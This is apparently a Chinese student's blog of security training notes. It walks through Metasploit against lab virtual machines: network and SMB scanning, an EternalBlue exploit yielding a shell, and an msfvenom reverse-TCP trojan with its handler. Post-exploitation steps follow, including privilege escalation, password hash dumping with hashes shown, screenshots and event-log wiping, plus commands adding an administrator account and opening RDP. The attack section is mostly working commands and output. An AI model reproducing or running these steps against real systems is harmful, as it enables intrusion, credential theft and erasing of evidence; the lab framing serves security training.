暑期实习(培训)笔记,网安相关。
2019/7/6
上午:安装VMware
下午:介绍操作系统,安装虚拟机windows和linux
2019/7/7
物理地址全国唯一,IPv4地址是自己的。
windows命令:
1.查看ip地址:
ipconfig更全的包括物理地址:
ipconfig /all网络状态
netstat -a2.
// 查看有哪些用户
net user// 加一个heibai的用户密码为lovechina
net user sms2056 lovechina /add// 把他加入Administrator组
net localgroup Administrators sms2056 /add3.打开端口
//方法一
// 开启3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
//方法二
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
//方法三
//直接写成BAT文件
echo Windows Registry Editor Version 5.00>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg del 3389.reglinux命令
查看ip地址:
root@qzz:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.92.131 netmask 255.255.255.0 broadcast 192.168.92.255
inet6 fe80::20c:29ff:fe0e:c39b prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:0e:c3:9b txqueuelen 1000 (Ethernet)
RX packets 33 bytes 2956 (2.8 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20 bytes 2060 (2.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 10 bytes 456 (456.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10 bytes 456 (456.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Linux系统的ping命令是常用的网络命令,它通常用来测试与目标主机的连通性。
(详见:https://www.cnblogs.com/ftl1012/p/ping.html)
(最后按Ctrl-C停止)
root@qzz:~# ping 主机ip地址
PING 主机ip地址 56(84) bytes of data.
64 bytes from 主机ip地址: icmp_seq=1 ttl=64 time=0.022 ms
64 bytes from 主机ip地址: icmp_seq=2 ttl=64 time=0.077 msls命令:显示当前目录下的文件列表
root@qzz:~# ls /
0 boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz//ls /-l显示出的是当前路径下文件列表的详细信息,包括以“.”开头的隐藏文件。
root@qzz:~# ls / -l
总用量 68
-rw-r--r-- 1 root root 0 3月 1 03:16 0
lrwxrwxrwx 1 root root 7 7月 6 11:18 bin -> usr/bin
drwxr-xr-x 3 root root 4096 7月 6 16:35 boot
drwxr-xr-x 17 root root 3320 7月 7 13:43 dev
drwxr-xr-x 178 root root 12288 7月 7 13:43 etc
drwxr-xr-x 2 root root 4096 11月 29 2018 home
lrwxrwxrwx 1 root root 34 7月 6 11:18 initrd.img -> boot/initrd.img-4.19.0-kali3-amd64
lrwxrwxrwx 1 root root 34 7月 6 11:18 initrd.img.old -> boot/initrd.img-4.19.0-kali3-amd64
lrwxrwxrwx 1 root root 7 7月 6 11:18 lib -> usr/lib
lrwxrwxrwx 1 root root 9 7月 6 11:18 lib32 -> usr/lib32pwd:查看当前所在路径
root@qzz:/# pwd
/cd ..:返回上一级
cd /:去那个路径
Metasploit配置
(开源的安全漏洞检测工具)
0.查看状态
root@qzz:/# service postgresql status
● postgresql.service - PostgreSQL RDBMS
Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
Active: inactive (dead)
//是关着的1.启动动PostgreSQL服务
为Metasploit 使用PostgreSQL作为数据库,所以必须先启PostgreSQL服务。
service postgresql start
// 或
systemctl status postgresql//启动以后
root@qzz:/# service postgresql status
● postgresql.service - PostgreSQL RDBMS
Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
Active: active (exited) since Sun 2019-07-07 13:51:54 CST; 2s ago
Process: 4076 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
Main PID: 4076 (code=exited, status=0/SUCCESS)
7月 07 13:51:54 qzz systemd[1]: Starting PostgreSQL RDBMS...
7月 07 13:51:54 qzz systemd[1]: Started PostgreSQL RDBMS.执行成功后,可以通过 ss -ant 命令查看端口5432是否在侦听,去验证PostgreSQL服务是否成功开启。
root@qzz:/# ss -ant
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 127.0.0.1:5432 0.0.0.0:*
LISTEN 0 128 [::1]:5432 [::]:*2.初始化Metasploit数据库
root@qzz:/# msfdb init命令‘初始化
root@qzz:/# msfdb init
[i] Database already started
[+] Creating database user 'msf'
为新角色输入的口令:
再输入一遍:
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema3.启动Metasploit
msfdb run
// 或
msfconsoleroot@qzz:/# msfdb run
[i] Database already started
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
https://metasploit.com
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]//db_status验证数据库是否与MSF对联
msf5 > db_status
[*] Connected to msf. Connection type: postgresql.4.构建模块缓存
msf5 > db_rebuild_cache
[*] Purging and rebuilding the module cache in the background...5.测试缓存是否可用
以 ms08-067 为例
msf5 > search ms08-067
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruptionms08-067是一个漏洞,服务器服务中的漏洞可能允许远程执行代码
如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。
6.开机自启
重新打开一个终端。
update-rc.d postgresql enableMetasploit信息收集
1.启动MSF
root@qzz:~# msfdb run
[i] Database already started
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]检查状态:
msf5 > db_status
[*] Connected to msf. Connection type: postgresql.检查当前的工作站:(default是系统自带)
msf5 > workspace
* default创建一个新的工作站:
msf5 > workspace -a newwork
[*] Added workspace: newwork
[*] Workspace: newwork每次创建一个新的,就会自动使用你创建的那个新的工作站,如果想要制定使用哪个工作站,可以使用workspace 工作站名来更改。
删除一个工作站:
msf5 > workspace -d gongzuozhan
[*] Deleted workspace: gongzuozhan2.主机发现
扫描当前网段:
其中:-v是输出详细的信息,-sV是进行版本探测。
(详见:https://www.cnblogs.com/chia/p/9040805.html)
msf5 > nmap -v -sV 主机ip地址/24 -oA 192_
[*] exec: nmap -v -sV 主机ip地址/24 -oA 192_
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 14:10 CST
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 14:10
Scanning 255 hosts [1 port/host]
Completed ARP Ping Scan at 14:10, 1.98s elapsed (255 total hosts)
Initiating Parallel DNS resolution of 255 hosts. at 14:10
Completed Parallel DNS resolution of 255 hosts. at 14:10, 0.07s elapsed扫描出的端口:(上一步的内容
Host is up (0.00083s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC其中有一个445端口。
445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉!2017年10月,由于病毒“坏兔子”来袭,国家互联网应急中心等安全机构建议用户及时关闭计算机以及网络设备上的445和139端口。
(关于端口和一个实例参考:https://blog.csdn.net/wxl2012/article/details/5383321)
查看生成好的文件:
msf5 > ls -l
[*] exec: ls -l
总用量 112
-rw-r--r-- 1 root root 14412 7月 7 15:17 192_.gnmap
-rw-r--r-- 1 root root 15767 7月 7 15:17 192_.nmap
-rw-r--r-- 1 root root 43207 7月 7 15:17 192_.xml
drwxr-xr-x 2 root root 4096 7月 6 12:59 公共
drwxr-xr-x 2 root root 4096 7月 6 12:59 模板
drwxr-xr-x 2 root root 4096 7月 6 12:59 视频
drwxr-xr-x 2 root root 4096 7月 6 12:59 图片
drwxr-xr-x 2 root root 4096 7月 6 12:59 文档
drwxr-xr-x 2 root root 4096 7月 6 12:59 下载
drwxr-xr-x 2 root root 4096 7月 6 12:59 音乐
drwxr-xr-x 4 root root 4096 7月 6 16:35 桌面
drwxr-xr-x 2 root root 4096 7月 6 15:05 a将结果导入到你创建的那个workspace:
msf5 > db_import 192_.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.10.1'
[*] Importing host 192.168.92.1
[*] Importing host 192.168.92.2
[*] Importing host 192.168.92.130
[*] Importing host 192.168.92.254
[*] Importing host
[*] Successfully imported /root/192_.xml显示导入结果:
msf5 > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.92.1 00:50:56:c0:00:08 bogon Unknown device
192.168.92.2 00:50:56:f6:39:4b bogon Unknown device
192.168.92.130 00:0c:29:ba:ab:08 bogon Unknown device
//自己的主机ip地址// bogon Unknown device
192.168.92.254 00:50:56:e9:af:8c bogon Unknown device其中我们看到有一个是自己的ip,这个就不用扫描,我们可以把它删除掉。
msf5 > hosts -d 你要删除掉的
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
bogon Unknown device
[*] Deleted 1 hosts3.端口扫描
搜索Metasploit中的端口扫描器:
msf5 > search portscan
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/scanner/http/wordpress_pingback_access normal Yes Wordpress Pingback Locator
auxiliary/scanner/natpmp/natpmp_portscan normal Yes NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal Yes TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal Yes FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal Yes TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal Yes TCP Port Scanner
auxiliary/scanner/portscan/xmas normal Yes TCP "XMas" Port Scanner
auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner我们可以看到有很多的扫描工具,我们使用auxiliary/scanner/portscan/syn来扫描。
msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) >可以看到前缀已经修改。
显示配置项:
msf5 auxiliary(scanner/portscan/syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
DELAY 0 yes The delay between connections, per thread, in milliseconds
INTERFACE no The name of the interface
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds导入扫描目标:
msf5 auxiliary(scanner/portscan/syn) > hosts -R
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.92.1 00:50:56:c0:00:08 bogon Unknown device
192.168.92.2 00:50:56:f6:39:4b bogon Unknown device
192.168.92.130 00:0c:29:ba:ab:08 bogon Unknown device
192.168.92.254 00:50:56:e9:af:8c bogon Unknown device
RHOSTS => 192.168.92.1 192.168.92.2 192.168.92.130 192.168.92.254再次show options我们就可以看到导入成功了。
(在RHOSTS这一行)
msf5 auxiliary(scanner/portscan/syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
DELAY 0 yes The delay between connections, per thread, in milliseconds
INTERFACE no The name of the interface
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.92.1 192.168.92.2 192.168.92.130 192.168.92.254 yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds设置扫描端口,只扫描445端口 :
msf5 auxiliary(scanner/portscan/syn) > set PORTS 445
PORTS => 445开始运行扫描器:
msf5 auxiliary(scanner/portscan/syn) > run
[+] TCP OPEN 192.168.92.1:445
[+] TCP OPEN 192.168.92.130:445
[*] Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed4.SMB版本扫描
搜索:
msf5 auxiliary(scanner/portscan/syn) > search smb_version
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/scanner/smb/smb_version normal Yes SMB Version Detection切换:
msf5 auxiliary(scanner/portscan/syn) > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > search smb_version导入:
msf5 auxiliary(scanner/smb/smb_version) > hosts -R
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.92.1 00:50:56:c0:00:08 bogon Unknown device
192.168.92.2 00:50:56:f6:39:4b bogon Unknown device
192.168.92.130 00:0c:29:ba:ab:08 bogon Unknown device
192.168.92.254 00:50:56:e9:af:8c bogon Unknown device
RHOSTS => 192.168.92.1 192.168.92.2 192.168.92.130 192.168.92.254运行:
msf5 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.92.1:445 - Host could not be identified: ()
[*] Scanned 1 of 4 hosts (25% complete)
[*] Scanned 2 of 4 hosts (50% complete)
[+] 192.168.92.130:445 - Host is running Windows 2008 R2 Enterprise SP1 (build:7601) (name:WIN-PA5UULAVJOQ) (workgroup:WORKGROUP )
[*] Scanned 3 of 4 hosts (75% complete)
[*] Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed显示扫描过程中的服务信息:
//先返回
msf5 auxiliary(scanner/smb/smb_version) > back
msf5 >
//显示
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.92.1 135 tcp msrpc open Microsoft Windows RPC
192.168.92.1 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
192.168.92.1 445 tcp smb open ()
192.168.92.1 8082 tcp blackice-alerts open
192.168.92.2 53 tcp domain open unknown banner: hrb dns
192.168.92.130 135 tcp msrpc open Microsoft Windows RPC
192.168.92.130 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
192.168.92.130 445 tcp smb open Windows 2008 R2 Enterprise SP1 (build:7601) (name:WIN-PA5UULAVJOQ) (workgroup:WORKGROUP )
192.168.92.130 3389 tcp ms-wbt-server open Microsoft Terminal Service
192.168.92.130 49152 tcp msrpc open Microsoft Windows RPC
192.168.92.130 49153 tcp msrpc open Microsoft Windows RPC
192.168.92.130 49154 tcp msrpc open Microsoft Windows RPC
192.168.92.130 49155 tcp msrpc open Microsoft Windows RPC
192.168.92.130 49156 tcp msrpc open Microsoft Windows RPCMetasploit永恒之蓝漏洞利用
1.搜索相关漏洞
msf5 > search 17-010
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution其中:eternalblue 就是永恒之蓝。
2.检查存在漏洞的主机
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) >msf5 auxiliary(scanner/smb/smb_ms17_010) > hosts -R
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.92.1 00:50:56:c0:00:08 bogon Unknown device
192.168.92.2 00:50:56:f6:39:4b bogon Unknown device
192.168.92.130 00:0c:29:ba:ab:08 WIN-PA5UULAVJOQ Windows 2008 R2 Enterprise SP1 server
bogon Unknown device
192.168.92.254 00:50:56:e9:af:8c bogon Unknown device
RHOSTS => 192.168.92.1 192.168.92.2 192.168.92.130 192.168.92.131 192.168.92.254
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[-] 192.168.92.1:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] Scanned 1 of 5 hosts (20% complete)
[*] Scanned 2 of 5 hosts (40% complete)
[+] 192.168.92.130:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 3 of 5 hosts (60% complete)
[*] Scanned 4 of 5 hosts (80% complete)
[*] Scanned 5 of 5 hosts (100% complete)
[*] Auxiliary module execution completed其中:Host is likely VULNERABLE to MS17-010!这一个我们可以对其进行攻击。即:192.168.92.130
3.攻击主机
使用漏洞模块:
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) >设置:
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.92.130
RHOST => 192.168.92.130运行攻击指令exploit:
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.92.131:4444
[*] 192.168.92.130:445 - Connecting to target for exploitation.
[+] 192.168.92.130:445 - Connection established for exploitation.
[+] 192.168.92.130:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.92.130:445 - CORE raw buffer dump (53 bytes)
[*] 192.168.92.130:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.92.130:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 192.168.92.130:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 192.168.92.130:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 192.168.92.130:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.92.130:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.92.130:445 - Sending all but last fragment of exploit packet
[*] 192.168.92.130:445 - Starting non-paged pool grooming
[+] 192.168.92.130:445 - Sending SMBv2 buffers
[+] 192.168.92.130:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.92.130:445 - Sending final SMBv2 buffers.
[*] 192.168.92.130:445 - Sending last fragment of exploit packet!
[*] 192.168.92.130:445 - Receiving response from exploit packet
[+] 192.168.92.130:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.92.130:445 - Sending egg to corrupted connection.
[*] 192.168.92.130:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.92.131:4444 -> 192.168.92.130:49897) at 2019-07-07 16:44:57 +0800
[+] 192.168.92.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.92.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.92.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=最后显示表示攻击成功。
Metasploit木马生成
(在这里使用到了共享文件的方式,在自己电脑上新建文件夹,然后传到虚拟机上。
(共享文件打开方式:右键-设置-选项-共享文件夹-启动-添加
1.生成木马【使用Kali端
root@qzz:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=本地ip LPORT=6666 -f exe >a.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes其中:a.exe 是生成的木马名字,可以自己设置。
然后我们可以看到已经生成的a.exe文件:
root@qzz:~# ls
192_.gnmap 192_.nmap 192_.xml 公共 模板 视频 图片 文档 下载 音乐 桌面 a a.exe走到所在的共享文件夹,然后可以查到该文件:
root@qzz:~# cd /mnt/hgfs/share1
root@qzz:/mnt/hgfs/share1# cp /root/a.exe a.exe
root@qzz:/mnt/hgfs/share1# ls
a.exe2.启动监听服务
root@qzz:~# msfdb run设置监听句柄:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) >查看参数:
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target设置payload:
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp再次查看:
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target设置ip和端口:
msf5 exploit(multi/handler) > set LHOST xxx
LHOST => xxx
msf5 exploit(multi/handler) > set LPORT 6666
LPORT => 6666运行:(此处需要在windows系统里手动传入之前设置的木马,然后双击运行,在kali端写入run才能出现如下代码:
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.xxx:6666
[*] Sending stage (206403 bytes) to 192.168.xx.xxx
[*] Meterpreter session 1 opened (192.168.xxx:6666 -> 192.168.92.128:49543) at 2019-07-08 13:40:37 +0800现在这个状态就是已经可以远程控制windows这台虚拟机了。
meterpreter >可以进行输入以下命令对windows虚拟机进行修改:
(具体可以输入help进行查看有哪些命令
【参考:https://www.cnblogs.com/backlion/p/9484949.html
https://www.freebuf.com/sectool/154752.html】
1)查看当前目录:
cd:切换目标目录;
cat:读取文件内容;
del:删除文件;
edit:使用vim编辑文件
ls:获取当前目录下的文件;
mkdir:新建目录;
rmdir:删除目录2)上传下载文件:
download : 可以帮助我们从目标系统中下载文件
upload : 则能够向目标系统上传文件。3)获得密码文件:
(此步骤需要提高权限,如下所示:
//该命令用于提高权限
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
//该命令用于查询当前用户
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
//该命令用于查询密码信息
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a08165ec0d8fd106e559a010fd77ed66...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
//得到的密码信息
Administrator:500:aad3b435b51404eeaad3b435b51404ee:156e2a95f3c35674fb83ceb0693e39d2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xxx:1001:aad3b435b51404eeaad3b435b51404ee:df49e8812a10e919756bfefed1e6c899:::数据的输出格式为:用户名:SID:LM哈希:NTLM哈希:::
NTLM破解网站 : https://hashkiller.co.uk/Cracker
4)屏幕截图(其中第二行为保存在哪里
meterpreter > screenshot
Screenshot saved to: /root/noZfQkmZ.jpeg5)使用vnc远程控制
run vnc6)检测是否为虚拟机
meterpreter > run post/windows/gather/checkvm
[*] Checking if WIN-PA5UULAVJOQ is a Virtual Machine .....
[+] This is a VMware Virtual Machine7)运行制定程序
meterpreter > execute -f calc
Process 2128 created.meterpreter > idletime
User has been idle for: 1 min 41 secs8)查看
meterpreter > sysinfo
Computer : WIN-PA5UULAVJOQ
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows9)清除事件日志
meterpreter > clearev
[*] Wiping 8 records from Application...
[*] Wiping 25 records from System...
[*] Wiping 14 records from Security...10)查看用户进行了哪些操作:
meterpreter post/windows/gather/dumplinks
[*] Running module against WIN-PA5UULAVJOQ
[*] Running as SYSTEM extracting user list...
[*] Extracting lnk files for user Administrator at C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\...
[*] Processing: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\新建文本文档.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
[*] Extracting lnk files for user anyapei at C:\Users\anyapei\AppData\Roaming\Microsoft\Windows\Recent\...
[*] No Recent Office files found for user anyapei. Nothing to do.11)shell可以直接进入cmd命令行。
meterpreter > shell
Process 1276 created.
Channel 13 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Windows\system32>以上出现了乱码问题。
执行以下命令解决乱码:
chcp 65001本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!